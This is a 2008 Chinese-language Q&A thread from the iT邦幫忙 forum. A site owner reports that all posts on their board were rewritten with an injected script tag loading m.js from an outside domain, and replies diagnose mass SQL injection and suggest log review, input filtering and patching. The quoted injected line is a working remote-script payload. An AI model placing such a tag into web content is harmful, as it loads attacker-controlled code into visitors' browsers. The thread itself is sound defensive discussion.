iT邦幫忙

0

討論區文章被取代成JavaScript語法!!

請教各位前輩先進:

如果發生這樣的事情,討論區每一篇文章內容變成...

你好 本人姓黃做cnc銑床代工 有<script src=http://www.dota11.cn/m.js></script>

前台的留言已經有完善的過濾機制,還是被攻擊了... >"<
我確定這是後來才被動的手腳,
因為每個人的文章都變成這樣了!每一篇!

請問這是從伺服器本身的弱點攻擊,
還是透過網頁程式呢?

看更多先前的討論...收起先前的討論...
chetbaker iT邦新手 3 級 ‧ 2008-05-28 10:22:03 檢舉
你的討論區是自己寫的,還是用open source的呢?

被攻擊的點可能有很多,不過如果你很確定前端有完善的過濾機制,那就是從AP的弱對或伺服器的弱點機率比較高。
jerry640 iT邦新手 1 級 ‧ 2008-05-28 12:33:20 檢舉
最近很多這樣的網站攻擊 SQL injection
魯大 iT邦高手 1 級 ‧ 2008-05-28 13:06:58 檢舉
又是一個SQL Injection的攻擊事件..
唉~IT人真是可憐..
davistai iT邦大師 1 級 ‧ 2008-05-31 22:23:31 檢舉
很好的例子參考 ^^
yce701116 iT邦研究生 1 級 ‧ 2008-06-01 20:37:19 檢舉
感謝大家提供答案
52
fishk
iT邦大師 1 級 ‧ 2008-05-28 10:31:52
最佳解答

這應該是SQL Injection的方式入侵的, 除了留言的程式外, 提供瀏覽的程式也要做輸入值的檢查. 將; ' " 等符號進行檢查與替換.
已被攻擊的站台, 如果Web log沒有被清除掉, 查看看log就可以看的攻擊的方式.
如果你看到攻擊字串是亂碼, 那就是Hacker使用編碼的方式攻擊.

54
lucifer666
iT邦研究生 5 級 ‧ 2008-05-28 10:25:07

十之八九是Web應用程式的弱點被打進去
你的症狀跟這陣子新聞在炒作,大陸人寫自動SQL Injection工具攻擊的狀況一樣
所以大概是你的程式有SQL injection問題

把你的 Web Server 的記錄檔調出來看看,多少能看出一點端倪
可以知道大概是哪隻程式出錯

phonkaii iT邦新手 4 級 ‧ 2008-05-28 11:32:30 檢舉

大陸人寫自動SQL Injection工具攻擊

現在連 SQL Injection 都有自動機器人喔... = =
太可怕了吧...

38
lcs1206
iT邦研究生 1 級 ‧ 2008-05-29 07:39:01

1.針對特定IP封死它對本機的出入口(從 Log 檔抓,來打廣告的就殺)!
2.如前輸網友所提,釜底抽薪的方法是找出哪隻網頁程式出現問題,有能力或Patch檔就修正!
3.最差的情況,暫時無方案可解只好先停掉!

18
pqr0007
iT邦研究生 1 級 ‧ 2008-05-31 18:15:25

有創意...

我要發表回答

立即登入回答